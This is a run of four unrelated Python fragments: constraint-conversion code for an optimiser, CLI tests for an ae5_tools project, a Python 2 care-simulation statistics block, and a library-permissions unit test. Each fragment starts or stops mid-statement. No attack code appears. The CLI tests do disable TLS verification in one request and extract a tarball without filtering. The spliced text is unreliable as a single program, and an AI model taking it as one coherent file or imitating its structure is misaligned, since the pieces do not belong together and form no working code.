val_ineq, sign) if nonlinear.hess is None: new_hess = None else: def new_hess(x, v_eq=np.empty(0), v_ineq=np.empty(0)): hess = nonlinear.hess v = np.zeros(fun_len) if len(v_eq) > 0: v[eq] += v_eq if len(v_ineq) > 0: v[ineq[sign == 1]] += v_ineq[sign == 1] v[ineq[sign == -1]] -= v_ineq[sign == -1] return hess(x, v) if n_ineq == 0: enforce_feasibility = np.empty(0, dtype=bool) else: enforce_feasibility = nonlinear.enforce_feasibility[ineq] return CanonicalConstraint(n_vars, n_ineq, n_eq, new_constr, new_jac, new_hess, nonlinear.sparse_jacobian, enforce_feasibility, nonlinear.x0, c_ineq0, c_eq0, J_ineq0, J_eq0) def _linear_to_canonical(linear): return _nonlinear_to_canonical(linear.to_nonlinear()) def _box_to_canonical(box): return _linear_to_canonical(box.to_linear()) def _convert_constr(c, n_vars, n_eq, n_ineq, eq, ineq, val_eq, val_ineq, sign): # Empty constraint empty = np.empty((0,)) # Return equality and inequalit constraints c_eq = c[eq] - val_eq if n_eq > 0 else empty c_ineq = sign*(c[ineq] - val_ineq) if n_ineq > 0 else empty return c_ineq, c_eq def _convert_sparse_jac(J, n_vars, n_eq, n_ineq, eq, ineq, val_eq, val_ineq, sign): # Empty jacobian empty = spc.csr_matrix(np.empty((0, n_vars))) # Compute equality and inequality Jacobian matrices J_eq = J[eq, :] if n_eq > 0 else empty if n_ineq > 0: D = spc.lil_matrix((n_ineq, n_ineq)) D.setdiag(sign) J_ineq = D*J[ineq, :] else: J_ineq = empty # Return Jacobian matrices return J_ineq, J_eq def _convert_dense_jac(J, n_vars, n_eq, n_ineq, eq, ineq, val_eq, val_ineq, sign): # Empty jacobian empty = np.empty((0, n_vars)) # Compute equality and inequality Jacobian matrices J_eq = J[eq, :] if n_eq > 0 else empty if n_ineq > 0: J_ineq = np.multiply(J[ineq, :], sign[:, np.newaxis]) else: J_ineq = empty # Return Jacobian matrices return J_ineq, J_eq def _parse_constraint(kind): """Read constraint type and return list of indices. Parameters ---------- kind : tuple Specifies the type of contraint. Options for this parameters are: - ("interval", lb, ub): for a constraint of the type: lb[i] <= f[i] <= ub[i] - ("greater", lb): for a constraint of the type: f[i] >= lb[i] - ("less", ub): for a constraint of the type: f[i] <= ub[i] - ("equals", c): for a constraint of the type: f[i] == c[i] where ``lb``, ``ub`` and ``c`` are (m,) ndarrays. Returns ------- eq : array_like A vector indicating equality constraints. len(eq) = number of equality constraints ineq : array_like A vector indicating inequality constraints. len(ineq) = number of inequality constraints val_eq : array_like Equality constraint right hand side: f[eq[i]] = val_eq[i] val_ineq : array_like Inequality constraint right hand side: sign[i]*(f[ineq[i]] - val_ineq[i]) <= 0 sign : array_like Sign of inequality constraints. """ if kind[0] == "equals": # Read values from input structure c = np.asarray(kind[1], dtype=float) # Set returns eq = np.arange(len(c), dtype=int) ineq = np.empty(0, dtype=int) val_eq = np.asarray(c) val_ineq = np.empty(0) sign = np.empty(0) fun_len = len(c) elif kind[0] in ("greater", "less", "interval"): # Constraint type if kind[0] == "greater": lb = np.asarray(kind[1], dtype=float) ub = np.full_like(lb, np.inf, dtype=float) elif kind[0] == "less": ub = np.asarray(kind[1], dtype=float) lb = np.full_like(ub, -np.inf, dtype=float) elif kind[0] == "interval": lb = np.asarray(kind[1], dtype=float) ub = np.asarray(kind[2], dtype=float) # Set auxiliar values arange = np.arange(len(lb), dtype=int) ones = np.ones(len(lb)) lb_isinf = np.isinf(lb) ub_isinf = np.isinf(ub) eq_list = (lb == ub) & ~lb_isinf & ~ub_isinf # Set returns eq = arange[eq_list] val_eq = lb[eq_list] ineq = np.hstack((arange[~eq_list & ~lb_isinf], arange[~eq_list & ~ub_isinf])) val_ineq = np.hstack((lb[~eq_list & ~lb_isinf], ub[~eq_list & ~ub_isinf])) sign = np.hstack((-ones[~eq_list & ~lb_isinf], ones[~eq_list & ~ub_isinf])) fun_len = len(lb) else: raise RuntimeError("Never be here.") return eq, ineq, val_eq, val_ineq, sign, fun_len def _concatenate_canonical_constraints(constraints, sparse_jacobian=None): """Concatenate sequence of CanonicalConstraint's.""" # Compute number of constraints n_eq = 0 n_ineq = 0 for constr in constraints: n_eq += constr.n_eq n_ineq += constr.n_ineq # Get n_vars n_vars = 0 x0 = None for constr in constraints: if n_vars == 0: n_vars = constr.n_vars x0 = constr.x0 if n_vars != constr.n_vars: raise RuntimeError("Unmatching constraint number of arguments.") if not np.array_equal(x0, constr.x0): raise RuntimeError("Unmatching initial point.") # Concatenate constraints def new_constr(x): constr_list = [constr.constr(x) for constr in constraints] return _concatenate_constr(constr_list) constr0_list = [(constr.c_ineq0, constr.c_eq0) for constr in constraints] c_ineq0, c_eq0 = _concatenate_constr(constr0_list) # Use sparse if any of the matrices are sparse use_sparse = np.any([constr.sparse_jacobian for constr in constraints]) if use_sparse: def new_jac(x): jac_list = [constr.jac(x) for constr in constraints] return _concatenate_sparse_jac(jac_list) jac0_list = [(constr.J_ineq0, constr.J_eq0) for constr in constraints] J_ineq0, J_eq0 = _concatenate_sparse_jac(jac0_list) else: def new_jac(x): jac_list = [constr.jac(x) for constr in constraints] return _concatenate_dense_jac(jac_list) jac0_list = [(constr.J_ineq0, constr.J_eq0) for constr in constraints] J_ineq0, J_eq0 = _concatenate_dense_jac(jac0_list) # Concatenate Hessians def new_hess(x, v_eq=np.empty(0), v_ineq=np.empty(0)): hess_list = []
<filename>tests/test_cli.py import pytest import tempfile import time import os import pytest import pprint import requests import tarfile import glob import uuid from datetime import datetime from collections import namedtuple from ae5_tools.api import AEUnexpectedResponseError from .utils import _cmd, _compare_tarfiles, CMDException @pytest.fixture(scope='module') def project_list(user_session): return _cmd('project list --collaborators') def test_project_info(project_list): for rec0 in project_list: id = rec0['id'] pair = '{}/{}'.format(rec0['owner'], rec0['name']) rec1 = _cmd(f'project info {id}') rec2 = _cmd(f'project info {pair}') rec3 = _cmd(f'project info {pair}/{id}') assert all(rec0[k] == v for k, v in rec2.items()), pprint.pformat((rec0, rec2)) assert all(rec1[k] == v for k, v in rec2.items()), pprint.pformat((rec1, rec2)) assert rec2 == rec3 def test_project_info_errors(project_list): with pytest.raises(CMDException) as excinfo: _cmd('project info testproj1') assert 'Multiple projects' in str(excinfo.value) with pytest.raises(CMDException) as excinfo: _cmd('project info testproj4') assert 'No projects' in str(excinfo.value) @pytest.fixture(scope='module') def resource_profiles(user_session): return _cmd('resource-profile list') def test_resource_profiles(resource_profiles): for rec in resource_profiles: rec2 = _cmd(f'resource-profile info {rec["name"]}') assert rec == rec2 with pytest.raises(CMDException) as excinfo: _cmd(f'resource-profile info *') assert 'Multiple resource profiles found' in str(excinfo.value) with pytest.raises(CMDException) as excinfo: _cmd(f'resource-profile info abcdefg') assert 'No resource profiles found' in str(excinfo.value) @pytest.fixture(scope='module') def editors(user_session): return _cmd('editor list') def test_editors(editors): for rec in editors: assert rec == _cmd(f'editor info {rec["id"]}') assert sum(rec['is_default'].lower() == 'true' for rec in editors) == 1 assert set(rec['id'] for rec in editors).issuperset({'zeppelin', 'jupyterlab', 'notebook'}) def test_endpoints(): slist = _cmd('endpoint list') for rec in slist: rec2 = _cmd(f'endpoint info {rec["id"]}') assert rec == rec2 def test_samples(): slist = _cmd(f'sample list') assert sum(rec['is_default'].lower() == 'true' for rec in slist) == 1 assert sum(rec['is_template'].lower() == 'true' for rec in slist) > 1 for rec in slist: rec2 = _cmd(f'sample info "{rec["id"]}"') rec3 = _cmd(f'sample info "{rec["name"]}"') assert rec == rec2 and rec == rec3 def test_sample_clone(): cname = 'NLP-API' pname = 'testclone' rrec1 = _cmd(f'sample clone {cname} --name {pname}') with pytest.raises(CMDException) as excinfo: _cmd(f'sample clone {cname} --name {pname}') rrec2 = _cmd(f'sample clone {cname} --name {pname} --make-unique') rrec3 = _cmd(f'sample clone {cname}') _cmd(f'project delete {rrec1["id"]}') _cmd(f'project delete {rrec2["id"]}') _cmd(f'project delete {rrec3["id"]}') @pytest.fixture(scope='module') def cli_project(project_list): return next(rec for rec in project_list if rec['name'] == 'testproj3') @pytest.fixture(scope='module') def cli_revisions(cli_project): prec = cli_project revs = _cmd(f'project revision list {prec["id"]}') return prec, revs @pytest.fixture(scope='module') def downloaded_project(user_session, cli_revisions): prec, revs = cli_revisions with tempfile.TemporaryDirectory() as tempd: fname = _cmd(f'project download {prec["id"]}', table=False).strip() assert fname == prec['name'] + '.tar.gz' with tarfile.open(fname, 'r') as tf: tf.extractall(path=tempd) dnames = glob.glob(os.path.join(tempd, '*', 'anaconda-project.yml')) assert len(dnames) == 1 dname = os.path.dirname(dnames[0]) yield fname, dname for r in _cmd('project list'): if r['name'].startswith('test_upload'): _cmd(f'project delete {r["id"]}') assert not any(r['name'].startswith('test_upload') for r in _cmd('project list')) def test_project_download(downloaded_project): pass def test_project_upload(downloaded_project): fname, dname = downloaded_project _cmd(f'project upload {fname} --name test_upload1 --tag 1.2.3') rrec = _cmd(f'project revision list test_upload1') assert len(rrec) == 1 rev = rrec[0]['name'] fname2 = _cmd(f'project download test_upload1:{rev}', table=False).strip() assert fname2 == f'test_upload1-{rev}.tar.gz' assert os.path.exists(fname2) _compare_tarfiles(fname, fname2) if rev == '0.0.1': pytest.xfail("5.4.1 revision issue") assert rev == '1.2.3' def test_project_upload_as_directory(downloaded_project): fname, dname = downloaded_project _cmd(f'project upload {dname} --name test_upload2 --tag 1.3.4') rrec = _cmd(f'project revision list test_upload2') assert len(rrec) == 1 rev = rrec[0]['name'] fname2 = _cmd(f'project download test_upload2:{rev}', table=False).strip() assert fname2 == f'test_upload2-{rev}.tar.gz' assert os.path.exists(fname2) if rev == '0.0.1': pytest.xfail("5.4.1 revision issue") assert rev == '1.2.3' def test_project_revisions(cli_revisions): prec, revs = cli_revisions rev0 = _cmd(f'project revision info {prec["id"]}') assert revs[0] == rev0 rev0 = _cmd(f'project revision info {prec["id"]}:latest') assert revs[0] == rev0 for rev in revs: revN = _cmd(f'project revision info {prec["id"]}:{rev["id"]}') assert rev == revN def test_project_revision_errors(cli_revisions): prec, revs = cli_revisions with pytest.raises(CMDException) as excinfo: _cmd(f'project revision info testproj1') assert 'Multiple projects' in str(excinfo.value) with pytest.raises(CMDException) as excinfo: _cmd(f'project revision info testproj4') assert 'No projects' in str(excinfo.value) with pytest.raises(CMDException) as excinfo: _cmd(f'project revision info {prec["id"]}:0.*') assert 'Multiple revisions' in str(excinfo.value) with pytest.raises(CMDException) as excinfo: _cmd(f'project revision info {prec["id"]}:a.b.c') assert 'No revisions' in str(excinfo.value) def test_project_patch(cli_project, editors, resource_profiles): prec = cli_project old, new = {}, {} for what, wlist in (('resource-profile', (r['name'] for r in resource_profiles)), ('editor', (e['id'] for e in editors))): old[what] = prec[what.replace('-', '_')] new[what] = next(v for v in wlist if v != old) prec2 = _cmd(f'project patch {prec["id"]} ' + ' '.join(f'--{k}={v}' for k, v in new.items())) assert {k: prec2[k.replace('-', '_')] for k in new} == new prec3 = _cmd(f'project patch {prec["id"]} ' + ' '.join(f'--{k}={v}' for k, v in old.items())) assert {k: prec3[k.replace('-', '_')] for k in old} == old def test_project_collaborators(cli_project, project_list): prec = cli_project uname = next(rec['owner'] for rec in project_list if rec['owner'] != prec['owner']) id = prec['id'] with pytest.raises(CMDException) as excinfo: _cmd(f'project collaborator info {id} {uname}') assert f'No collaborators found matching id={uname}' in str(excinfo.value) clist = _cmd(f'project collaborator add {id} {uname}') assert len(clist) == 1 clist = _cmd(f'project collaborator add {id} everyone --group --read-only') assert len(clist) == 2 assert all(c['id'] == uname and c['permission'] == 'rw' and c['type'] == 'user' or c['id'] == 'everyone' and c['permission'] == 'r' and c['type'] == 'group' for c in clist) clist = _cmd(f'project collaborator add {id} {uname} --read-only') assert len(clist) == 2 assert all(c['id'] == uname and c['permission'] == 'r' and c['type'] == 'user' or c['id'] == 'everyone' and c['permission'] == 'r' and c['type'] == 'group' for c in clist) clist = _cmd(f'project collaborator remove {id} {uname} everyone') assert len(clist) == 0 with pytest.raises(CMDException) as excinfo: clist = _cmd(f'project collaborator remove {id} {uname}') assert f'Collaborator(s) not found: {uname}' in str(excinfo.value) def test_project_activity(cli_project): prec = cli_project activity = _cmd(f'project activity {prec["id"]}') assert 1 <= len(activity) <= 10 activity2 = _cmd(f'project activity --latest {prec["id"]}') assert activity[0] == activity2 activity3 = _cmd(f'project activity --limit 1 {prec["id"]}') assert activity[0] == activity3[0] with pytest.raises(CMDException) as excinfo: _cmd(f'project activity --latest --all {prec["id"]}') with pytest.raises(CMDException) as excinfo: _cmd(f'project activity --limit 2 --all {prec["id"]}') with pytest.raises(CMDException) as excinfo: _cmd(f'project activity --latest --limit 2 {prec["id"]}') @pytest.fixture(scope='module') def cli_session(cli_project): prec = cli_project srec = _cmd(f'session start {prec["owner"]}/{prec["name"]}') srec2 = _cmd(f'session restart {srec["id"]} --wait') assert not any(r['id'] == srec['id'] for r in _cmd('session list')) yield prec, srec2 _cmd(f'session stop {srec2["id"]}') assert not any(r['id'] == srec2['id'] for r in _cmd('session list')) def test_session(cli_session): prec, srec = cli_session assert srec['owner'] == prec['owner'], srec assert srec['name'] == prec['name'], srec # Ensure that the session can be retrieved by its project ID as well srec2 = _cmd(f'session info {srec["owner"]}/*/{prec["id"]}') assert srec2['id'] == srec['id'] endpoint = srec['id'].rsplit("-", 1)[-1] sdata = _cmd(f'call / --endpoint={endpoint}', table=False) assert 'Jupyter Notebook requires JavaScript.' in sdata, sdata def test_project_sessions(cli_session): prec, srec = cli_session slist = _cmd(f'project sessions {prec["id"]}') assert len(slist) == 1 and slist[0]['id'] == srec['id'] def test_session_branches(cli_session): prec, srec = cli_session branches = _cmd(f'session branches {prec["id"]}') bdict = {r['branch']: r['sha1'] for r in branches} assert set(bdict) == {'local', 'origin/local', 'master'}, branches assert bdict['local'] == bdict['master'], branches def test_session_before_changes(cli_session): prec, srec = cli_session changes1 = _cmd(f'session changes {prec["id"]}') changes1 = [c for c in changes1 if c['path'] != '.projectignore'] assert changes1 == [], changes1 changes2 = _cmd(f'session changes --master {prec["id"]}') changes2 = [c for c in changes1 if c['path'] != '.projectignore'] assert changes2 == [], changes2 @pytest.fixture(scope='module') def cli_deployment(cli_project): prec = cli_project dname = 'testdeploy' ename = 'testendpoint' drec = _cmd(f'project deploy {prec["owner"]}/{prec["name"]} --name {dname} --endpoint {ename} --command default --private') drec2 = _cmd(f'deployment restart {drec["id"]} --wait') assert not any(r['id'] == drec['id'] for r in _cmd('deployment list')) yield prec, drec2 _cmd(f'deployment stop {drec2["id"]}') assert not any(r['id'] == drec2['id'] for r in _cmd('deployment list')) def test_deploy(cli_deployment): prec, drec = cli_deployment assert drec['owner'] == prec['owner'], drec assert drec['project_name'] == prec['name'], drec for attempt in range(3): try: ldata = _cmd(f'call / --endpoint {drec["endpoint"]}', table=False) break except AEUnexpectedResponseError: time.sleep(attempt * 5) pass else: raise RuntimeError("Could not get the endpoint to respond") assert ldata.strip() == 'Hello Anaconda Enterprise!', ldata def test_project_deployments(cli_deployment): prec, drec = cli_deployment dlist = _cmd(f'project deployments {prec["id"]}') assert len(dlist) == 1 and dlist[0]['id'] == drec['id'] def test_deploy_patch(cli_deployment): prec, drec = cli_deployment flag = '--private' if drec['public'].lower() == 'true' else '--public' drec2 = _cmd(f'deployment patch {flag} {drec["id"]}') assert drec2['public'] != drec['public'] flag = '--private' if drec2['public'].lower() == 'true' else '--public' drec3 = _cmd(f'deployment patch {flag} {drec["id"]}') assert drec3['public'] == drec['public'] def test_deploy_token(user_session, cli_deployment): prec, drec = cli_deployment token = _cmd(f'deployment token {drec["id"]}', table=False).strip() resp = requests.get(f'https://{drec["endpoint"]}.' + user_session.hostname, headers={'Authorization': f'Bearer {token}'}, verify=False) assert resp.status_code == 200 assert resp.text.strip() == 'Hello Anaconda Enterprise!',
= [x for x in class_5 if x.status == 'inactive'] totalCareDemand_5 = float(sum([x.hoursDemand for x in class_5])) socialCareDemand_5 = float(sum([x.hoursDemand for x in inactivePeople_5])) shareSocialCare_5 = 0 if totalCareDemand_5 > 0: shareSocialCare_5 = socialCareDemand_5/totalCareDemand_5 # Graph 8 informalCareReceived = sum([x.informalCare for x in self.pop.livingPeople]) formalCareReceived = sum([x.formalCare for x in self.pop.livingPeople]) totalCareReceived = informalCareReceived + formalCareReceived totalUnnmetCareNeed = sum([x.residualNeed for x in self.pop.livingPeople]) # Graph 5 perCapitaCareReceived = totalCareReceived/currentPop perCapitaUnmetCareDemand = totalUnnmetCareNeed/currentPop # Graph 12 informalSocialCareReceived = sum([x.informalCare for x in self.pop.livingPeople if x.informalCare > 0]) formalSocialCareReceived = sum([x.formalCare for x in self.pop.livingPeople if x.formalCare > 0]) socialCareReceived = informalSocialCareReceived + formalSocialCareReceived unmetSocialCareNeed = sum([x.residualNeed for x in self.pop.livingPeople if x.residualNeed > 0]) if socialCareReceived != 0: print 'Share of unmet social care: ' + str(unmetSocialCareNeed/socialCareReceived) # Graph 6 perCapitaSocialCareReceived = socialCareReceived/currentPop perCapitaUnmetSocialCareDemand = unmetSocialCareNeed/currentPop # Graph 13 informalChildCareReceived = sum([x.informalCare for x in self.pop.livingPeople if x.status == 'child']) formalChildCareReceived = sum([x.formalCare for x in self.pop.livingPeople if x.status == 'child']) childCareReceived = informalChildCareReceived + formalChildCareReceived unmetChildCareNeed = sum([x.residualNeed for x in self.pop.livingPeople if x.status == 'child']) # Graph 7 perCapitaChildCareReceived = childCareReceived/currentPop perCapitaUnmetChildCareDemand = unmetChildCareNeed/currentPop # Graph 9: shareInformalCareReceived = 0 if totalCareReceived > 0: shareInformalCareReceived = informalCareReceived/totalCareReceived informalSocialCareReceived_1 = sum([x.informalCare for x in class_1 if x.status == 'inactive']) formalSocialCareReceived_1 = sum([x.formalCare for x in class_1 if x.status == 'inactive']) socialCareReceived_1 = informalSocialCareReceived_1 + formalSocialCareReceived_1 informalChildCareReceived_1 = sum([x.informalCare for x in class_1 if x.status == 'child']) formalChildCareReceived_1 = sum([x.formalCare for x in class_1 if x.status == 'child']) childCareReceived_1 = informalChildCareReceived_1 + formalChildCareReceived_1 totalInformalCare_1 = informalChildCareReceived_1 + informalSocialCareReceived_1 totalFormalCare_1 = formalChildCareReceived_1 + formalSocialCareReceived_1 totalCare_1 = socialCareReceived_1 + childCareReceived_1 shareInformalCareReceived_1 = 0 if totalCare_1 > 0: shareInformalCareReceived_1 = totalInformalCare_1/totalCare_1 informalSocialCareReceived_2 = sum([x.informalCare for x in class_2 if x.status == 'inactive']) formalSocialCareReceived_2 = sum([x.formalCare for x in class_2 if x.status == 'inactive']) socialCareReceived_2 = informalSocialCareReceived_2 + formalSocialCareReceived_2 informalChildCareReceived_2 = sum([x.informalCare for x in class_2 if x.status == 'child']) formalChildCareReceived_2 = sum([x.formalCare for x in class_2 if x.status == 'child']) childCareReceived_2 = informalChildCareReceived_2 + formalChildCareReceived_2 totalInformalCare_2 = informalChildCareReceived_2 + informalSocialCareReceived_2 totalFormalCare_2 = formalChildCareReceived_2 + formalSocialCareReceived_2 totalCare_2 = socialCareReceived_2 + childCareReceived_2 shareInformalCareReceived_2 = 0 if totalCare_2 > 0: shareInformalCareReceived_2 = totalInformalCare_2/totalCare_2 informalSocialCareReceived_3 = sum([x.informalCare for x in class_3 if x.status == 'inactive']) formalSocialCareReceived_3 = sum([x.formalCare for x in class_3 if x.status == 'inactive']) socialCareReceived_3 = informalSocialCareReceived_3 + formalSocialCareReceived_3 informalChildCareReceived_3 = sum([x.informalCare for x in class_3 if x.status == 'child']) formalChildCareReceived_3 = sum([x.formalCare for x in class_3 if x.status == 'child']) childCareReceived_3 = informalChildCareReceived_3 + formalChildCareReceived_3 totalInformalCare_3 = informalChildCareReceived_3 + informalSocialCareReceived_3 totalFormalCare_3 = formalChildCareReceived_3 + formalSocialCareReceived_3 totalCare_3 = socialCareReceived_3 + childCareReceived_3 shareInformalCareReceived_3 = 0 if totalCare_3 > 0: shareInformalCareReceived_3 = totalInformalCare_3/totalCare_3 informalSocialCareReceived_4 = sum([x.informalCare for x in class_4 if x.status == 'inactive']) formalSocialCareReceived_4 = sum([x.formalCare for x in class_4 if x.status == 'inactive']) socialCareReceived_4 = informalSocialCareReceived_4 + formalSocialCareReceived_4 informalChildCareReceived_4 = sum([x.informalCare for x in class_4 if x.status == 'child']) formalChildCareReceived_4 = sum([x.formalCare for x in class_4 if x.status == 'child']) childCareReceived_4 = informalChildCareReceived_4 + formalChildCareReceived_4 totalInformalCare_4 = informalChildCareReceived_4 + informalSocialCareReceived_4 totalFormalCare_4 = formalChildCareReceived_4 + formalSocialCareReceived_4 totalCare_4 = socialCareReceived_4 + childCareReceived_4 shareInformalCareReceived_4 = 0 if totalCare_4 > 0: shareInformalCareReceived_4 = totalInformalCare_4/totalCare_4 informalSocialCareReceived_5 = sum([x.informalCare for x in class_5 if x.status == 'inactive']) formalSocialCareReceived_5 = sum([x.formalCare for x in class_5 if x.status == 'inactive']) socialCareReceived_5 = informalSocialCareReceived_5 + formalSocialCareReceived_5 informalChildCareReceived_5 = sum([x.informalCare for x in class_5 if x.status == 'child']) formalChildCareReceived_5 = sum([x.formalCare for x in class_5 if x.status == 'child']) childCareReceived_5 = informalChildCareReceived_5 + formalChildCareReceived_5 totalInformalCare_5 = informalChildCareReceived_5 + informalSocialCareReceived_5 totalFormalCare_5 = formalChildCareReceived_5 + formalSocialCareReceived_5 totalCare_5 = socialCareReceived_5 + childCareReceived_5 shareInformalCareReceived_5 = 0 if totalCare_5 > 0: shareInformalCareReceived_5 = totalInformalCare_5/totalCare_5 # Graph 10: shareInformalSocialCare = 0 if socialCareReceived > 0: shareInformalSocialCare = informalSocialCareReceived/socialCareReceived shareInformalSocialCare_1 = 0 if socialCareReceived_1 > 0: shareInformalSocialCare_1 = informalSocialCareReceived_1/socialCareReceived_1 shareInformalSocialCare_2 = 0 if socialCareReceived_2 > 0: shareInformalSocialCare_2 = informalSocialCareReceived_2/socialCareReceived_2 shareInformalSocialCare_3 = 0 if socialCareReceived_3 > 0: shareInformalSocialCare_3 = informalSocialCareReceived_3/socialCareReceived_3 shareInformalSocialCare_4 = 0 if socialCareReceived_4 > 0: shareInformalSocialCare_4 = informalSocialCareReceived_4/socialCareReceived_4 shareInformalSocialCare_5 = 0 if socialCareReceived_5 > 0: shareInformalSocialCare_5 = informalSocialCareReceived_5/socialCareReceived_5 # Garph 11 shareInformalChildCare = 0 if childCareReceived > 0: shareInformalChildCare = informalChildCareReceived/childCareReceived shareInformalChildCare_1 = 0 if childCareReceived_1 > 0: shareInformalChildCare_1 = informalChildCareReceived_1/childCareReceived_1 shareInformalChildCare_2 = 0 if childCareReceived_2 > 0: shareInformalChildCare_2 = informalChildCareReceived_2/childCareReceived_2 shareInformalChildCare_3 = 0 if childCareReceived_3 > 0: shareInformalChildCare_3 = informalChildCareReceived_3/childCareReceived_3 shareInformalChildCare_4 = 0 if childCareReceived_4 > 0: shareInformalChildCare_4 = informalChildCareReceived_4/childCareReceived_4 shareInformalChildCare_5 = 0 if childCareReceived_5 > 0: shareInformalChildCare_5 = informalChildCareReceived_5/childCareReceived_5 # Graph 14 shareUnmetCareDemand = 0 if totalCareNeed > 0: shareUnmetCareDemand = totalUnnmetCareNeed/totalCareNeed unmetCareNeed_1 = sum([x.residualNeed for x in class_1]) shareUnmetCareDemand_1 = 0 if totalCareDemand_1 > 0: shareUnmetCareDemand_1 = unmetCareNeed_1/totalCareDemand_1 unmetCareNeed_2 = sum([x.residualNeed for x in class_2]) shareUnmetCareDemand_2 = 0 if totalCareDemand_2 > 0: shareUnmetCareDemand_2 = unmetCareNeed_2/totalCareDemand_2 unmetCareNeed_3 = sum([x.residualNeed for x in class_3]) shareUnmetCareDemand_3 = 0 if totalCareDemand_3 > 0: shareUnmetCareDemand_3 = unmetCareNeed_3/totalCareDemand_3 unmetCareNeed_4 = sum([x.residualNeed for x in class_4]) shareUnmetCareDemand_4 = 0 if totalCareDemand_4 > 0: shareUnmetCareDemand_4 = unmetCareNeed_4/totalCareDemand_4 unmetCareNeed_5 = sum([x.residualNeed for x in class_5]) shareUnmetCareDemand_5 = 0 if totalCareDemand_5 > 0: shareUnmetCareDemand_5 = unmetCareNeed_5/totalCareDemand_5 # Graph 15 totalSocialCareNeed = sum([x.hoursDemand for x in self.pop.livingPeople if x.status == 'inactive']) shareUnmetSocialCareDemand = 0 if totalSocialCareNeed > 0: shareUnmetSocialCareDemand = unmetSocialCareNeed/totalSocialCareNeed unmetSocialCareNeed_1 = sum([x.residualNeed for x in class_1 if x.status == 'inactive']) totalSocialCareNeed_1 = sum([x.hoursDemand for x in class_1 if x.status == 'inactive']) shareUnmetSocialCareDemand_1 = 0 if totalSocialCareNeed_1 > 0: shareUnmetSocialCareDemand_1 = unmetSocialCareNeed_1/totalSocialCareNeed_1 unmetSocialCareNeed_2 = sum([x.residualNeed for x in class_2 if x.status == 'inactive']) totalSocialCareNeed_2 = sum([x.hoursDemand for x in class_2 if x.status == 'inactive']) shareUnmetSocialCareDemand_2 = 0 if totalSocialCareNeed_2 > 0: shareUnmetSocialCareDemand_2 = unmetSocialCareNeed_2/totalSocialCareNeed_2 unmetSocialCareNeed_3 = sum([x.residualNeed for x in class_3 if x.status == 'inactive']) totalSocialCareNeed_3 = sum([x.hoursDemand for x in class_3 if x.status == 'inactive']) shareUnmetSocialCareDemand_3 = 0 if totalSocialCareNeed_3 > 0: shareUnmetSocialCareDemand_3 = unmetSocialCareNeed_3/totalSocialCareNeed_3 unmetSocialCareNeed_4 = sum([x.residualNeed for x in class_4 if x.status == 'inactive']) totalSocialCareNeed_4 = sum([x.hoursDemand for x in class_4 if x.status == 'inactive']) shareUnmetSocialCareDemand_4 = 0 if totalSocialCareNeed_4 > 0: shareUnmetSocialCareDemand_4 = unmetSocialCareNeed_4/totalSocialCareNeed_4 unmetSocialCareNeed_5 = sum([x.residualNeed for x in class_5 if x.status == 'inactive']) totalSocialCareNeed_5 = sum([x.hoursDemand for x in class_5 if x.status == 'inactive']) shareUnmetSocialCareDemand_5 = 0 if totalSocialCareNeed_5 > 0: shareUnmetSocialCareDemand_5 = unmetSocialCareNeed_5/totalSocialCareNeed_5 # Graph 16 totalChildCareNeed = sum([x.hoursDemand for x in self.pop.livingPeople if x.status == 'child']) shareUnmetChildCareDemand = 0 if totalChildCareNeed > 0: shareUnmetChildCareDemand = unmetChildCareNeed/totalChildCareNeed unmetChildCareNeed_1 = sum([x.residualNeed for x in class_1 if x.status == 'child']) totalChildCareNeed_1 = sum([x.hoursDemand for x in class_1 if x.status == 'child']) shareUnmetChildCareDemand_1 = 0 if totalChildCareNeed_1 > 0: shareUnmetChildCareDemand_1 = unmetChildCareNeed_1/totalChildCareNeed_1 unmetChildCareNeed_2 = sum([x.residualNeed for x in class_2 if x.status == 'child']) totalChildCareNeed_2 = sum([x.hoursDemand for x in class_2 if x.status == 'child']) shareUnmetChildCareDemand_2 = 0 if totalChildCareNeed_2 > 0: shareUnmetChildCareDemand_2 = unmetChildCareNeed_2/totalChildCareNeed_2 unmetChildCareNeed_3 = sum([x.residualNeed for x in class_3 if x.status == 'child']) totalChildCareNeed_3 = sum([x.hoursDemand for x in class_3 if x.status == 'child']) shareUnmetChildCareDemand_3 = 0 if totalChildCareNeed_3 > 0: shareUnmetChildCareDemand_3 = unmetChildCareNeed_3/totalChildCareNeed_3 unmetChildCareNeed_4 = sum([x.residualNeed for x in class_4 if x.status == 'child']) totalChildCareNeed_4 = sum([x.hoursDemand for x in class_4 if x.status == 'child']) shareUnmetChildCareDemand_4 = 0 if totalChildCareNeed_4 > 0: shareUnmetChildCareDemand_4 = unmetChildCareNeed_4/totalChildCareNeed_4 unmetChildCareNeed_5 = sum([x.residualNeed for x in class_5 if x.status == 'child']) totalChildCareNeed_5 = sum([x.hoursDemand for x in class_5 if x.status == 'child']) shareUnmetChildCareDemand_5 = 0 if totalChildCareNeed_5 > 0: shareUnmetChildCareDemand_5 = unmetChildCareNeed_5/totalChildCareNeed_5 # Graph 17 perCapitaUnmetCareDemand_1 = 0 if numClass_1 > 0: perCapitaUnmetCareDemand_1 = unmetCareNeed_1/numClass_1 perCapitaUnmetCareDemand_2 = 0 if numClass_2 > 0: perCapitaUnmetCareDemand_2 = unmetCareNeed_2/numClass_2 perCapitaUnmetCareDemand_3 = 0 if numClass_3 > 0: perCapitaUnmetCareDemand_3 = unmetCareNeed_3/numClass_3 perCapitaUnmetCareDemand_4 = 0 if numClass_4 > 0: perCapitaUnmetCareDemand_4 = unmetCareNeed_4/numClass_4 perCapitaUnmetCareDemand_5 = 0 if numClass_5 > 0: perCapitaUnmetCareDemand_5 = unmetCareNeed_5/numClass_5 # Graph 18 numReceivers
make a library we need an actual user user = User(absolute_uid=self.stub_user.absolute_uid) with self.app.session_scope() as session: session.add(user) session.commit() session.refresh(user) session.expunge(user) # Make a library that ensures we get one back stub_library = LibraryShop() library_dict = self.user_view.create_library( service_uid=user.id, library_data=stub_library.user_view_post_data ) with self.app.session_scope() as session: library_1 = session.query(Library).filter(Library.id == BaseView.helper_slug_to_uuid(library_dict['id'])).one() session.expunge(library_1) self.document_view.update_library( library_id=BaseView.helper_slug_to_uuid(library_dict['id']), library_data=dict(public=True) ) with self.app.session_scope() as session: library_2 = session.query(Library).filter(Library.id == BaseView.helper_slug_to_uuid(library_dict['id'])).one() self.assertEqual(library_1.date_created, library_2.date_created) self.assertNotEqual(library_1.date_created, library_2.date_last_modified) def test_returned_permissions_are_right(self): """ Test that the correct permissions get returned for a library :return: no return """ # Stub data stub_user_other = UserShop() # To make a library we need an actual user user = User(absolute_uid=self.stub_user.absolute_uid) user_other = User(absolute_uid=stub_user_other.absolute_uid) with self.app.session_scope() as session: 